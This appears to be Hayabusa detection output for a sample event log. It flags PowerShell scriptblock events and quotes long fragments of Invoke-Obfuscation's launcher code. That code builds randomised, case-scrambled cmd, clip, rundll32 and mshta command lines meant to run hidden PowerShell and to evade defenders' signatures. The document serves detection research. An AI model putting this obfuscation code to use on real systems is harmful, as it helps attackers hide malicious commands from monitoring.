$PowerShellClip = Out-RandomClipboardInvokeSyntax # Since we're embedding $PowerShellClip syntax one more process deep we need to double-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""^$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""^$Char"",""^^^$Char"") } } # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). $PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. $PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. 
For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PsCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 11 { ############## ## RUNDLL++ ## ############## # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. 
ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. 
$Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"t','*xec*t','*ecu*t','*cut*t','*cuti*t','*uti*t','E*ext','E*xt','E*Cont*','E*onte*','E*tex*','ExecutionContext')) + ').Value' # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariable # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $VariableName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$VariableName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random Invoke-Expression/IEX/$ExecutionContext syntax. $InvokeOptions = @() $InvokeOptions += (Get-Random -Input ('IEX','Invoke-Expression')) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $GetRandomVariableSyntax $InvokeOptions += (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $GetRandomVariableSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' # Select random option from above. 
$InvokeOption = Get-Random -Input $InvokeOptions # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $ExecContextVariable = ([Char[]]$ExecContextVariable.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $GetRandomVariableSyntax = ([Char[]]$GetRandomVariableSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Undo some escaping from beginning of function. 
ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} If($PowerShellStdin.Contains(""^$Char"")) {$PowerShellStdin = $PowerShellStdin.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellStdin + ' '*(Get-Random -Minimum 0 -Maximum 3) $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3)+ $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $SetSyntax2 + $Echo + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + '^|' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 10 { ############ ## CLIP++ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellClip = Out-RandomClipboardInvokeSyntax # Since we're embedding $PowerShellClip syntax one more process deep we need to double-escape & < > and | characters for cmd.exe. 
ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""^$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""^$Char"",""^^^$Char"") } } # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). $PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. $PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. 
For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PsCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 11 { ############## ## RUNDLL++ ## ############## # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. 
ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. 
$Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$InvokeOption`"""" $RundllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToRunDll + $RundllCmdSyntax # Set argument info for process tree output after this Switch block. 
$ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToRunDll , $RundllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 12 { ############# ## MSHTA++ ## ############# # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. 
$SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. # Keep calling Out-RandomInvokeRandomEnvironmentVariableSyntax until we get the shorter syntax (not using $ExecutionContext syntax) since mshta.exe has a short argument size limitation. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') While($InvokeOption.Length -gt 200) { $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') } # Generate randomize case syntax for all available command arguments for mshta.exe. $CreateObject = ([Char[]]'VBScript:CreateObject' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WScriptShell = ([Char[]]'WScript.Shell' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Run = ([Char[]]'.Run' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $TrueString = ([Char[]]'True' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WindowClose = ([Char[]]'Window.Close' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomly decide whether to concatenate WScript.Shell or just encapsulate it with double quotes. 
If((Get-Random -Input @(0..1)) -eq 0) { $WScriptShell = Out-ConcatenatedString $WScriptShell '""' } Else { $WScriptShell = '""' + $WScriptShell + '""' } # Randomly decide whether or not to concatenate PowerShell command. If((Get-Random -Input @(0..1)) -eq 0) { # Concatenate $InvokeOption and unescape double quotes from the result. $SubStringArray += (Out-ConcatenatedString $InvokeOption.Trim('""') '""').Replace('`""','""') # Remove concatenation introduced in above step if it concatenates immediately after a cmd.exe escape character. If($InvokeOption.Contains('^""+""')) { $InvokeOption = $InvokeOption.Replace('^""+""','^') } } # Random choose between using the numeral 1 and using a random subtraction syntax that is equivalent to 1. If((Get-Random -Input @(0..1)) -eq 0) { $One = 1 } Else { # Randomly select between two digit and three digit subtraction syntax. $RandomNumber = Get-Random -Minimum 3 -Maximum 25 If(Get-Random -Input @(0..1)) { $One = [String]$RandomNumber + '-' + ($RandomNumber-1) } Else { $SecondRandomNumber = Get-Random -Minimum 1 -Maximum $RandomNumber $One = [String]$RandomNumber + '-' + $SecondRandomNumber + '-' + ($RandomNumber-$SecondRandomNumber-1) } # Randomly decide to encapsulate with parentheses (not necessary). If((Get-Random -Input @(0..1)) -eq 0) { $One = '(' + $One + ')' } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption + '"",' + $One + ',' + $TrueString + "")($WindowClose)"" $MshtaCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $CreateObject + ""($WScriptShell)"" + $Run + '(""' + $PathToPowerShell + $PSCmdSyntax + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToMshta + $MshtaCmdSyntax # Set argument info for process tree output after this Switch block. 
$ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToMshta , $MshtaCmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } default {Write-Error ""An invalid `$LaunchType value ($LaunchType) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } # Output process tree output format of applied launcher to help the Blue Team find indicators and the Red Team to better avoid detection. If($ArgsDefenderWillSee.Count -gt 0) { Write-Host ""`n`nProcess Argument Tree of ObfuscatedCommand with current launcher:"" $Counter = -1 ForEach($Line in $ArgsDefenderWillSee) { If($Line.Count -gt 1) { $Part1 = $Line[0] $Part2 = $Line[1] } Else { $Part1 = $Line $Part2 = '' } $LineSpacing = '' If($Counter -ge 0) { $LineSpacing = ' '*$Counter Write-Host ""$LineSpacing|`n$LineSpacing\--> "" -NoNewline } # Print each command and argument, handling if the argument length is too long to display coherently. Write-Host $Part1 -NoNewLine -ForegroundColor Yellow # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 If($Part2.Length -gt $CmdMaxLength) { # Output Part2, handling if the size of Part2 exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. 
#OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = """" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ($Part1.Length+$LineSpacing.Length) $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $Part2.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Cyan Write-Host $RedactionMessage -NoNewLine -ForegroundColor Magenta Write-Host $Part2.SubString($Part2.Length-$RedactedPrintLength) -ForegroundColor Cyan } Else { Write-Host $Part2 -ForegroundColor Cyan } $Counter++ } Start-Sleep 1 } # Make sure final command doesn't exceed cmd.exe's character limit. # Only apply this check to LaunchType values less than 13 since all the other launchers are not command line launchers. $CmdMaxLength = 8190 If(($CmdLineOutput.Length -gt $CmdMaxLength) -AND ($LaunchType -lt 13)) { Write-Host """" Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" Start-Sleep 1 } Return $CmdLineOutput } Function Out-RandomInvokeRandomEnvironmentVariableSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized syntax for invoking a process-level environment variable. 
Invoke-Obfuscation Function: Out-RandomInvokeRandomEnvironmentVariableSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomInvokeRandomEnvironmentVariableSyntax generates random invoke syntax and random process-level environment variable retrieval syntax for invoking command contents that are stored in a user-input process-level environment variable. This function is primarily used as a helper function for Out-PowerShellLauncher. .PARAMETER EnvVarName User input string or array of strings containing environment variable names to randomly select and apply invoke syntax. .EXAMPLE C:\PS> Out-RandomInvokeRandomEnvironmentVariableSyntax 'varname' .(\""In\"" +\""v\"" + \""o\""+ \""Ke-ExpRes\""+ \""sION\"" ) (^&( \""GC\"" +\""i\"" ) eNV:vaRNAMe ).\""V`ALue\"" .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options wher",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. 
$PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$InvokeOption`"""" $RundllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToRunDll + $RundllCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToRunDll , $RundllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 12 { ############# ## MSHTA++ ## ############# # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. 
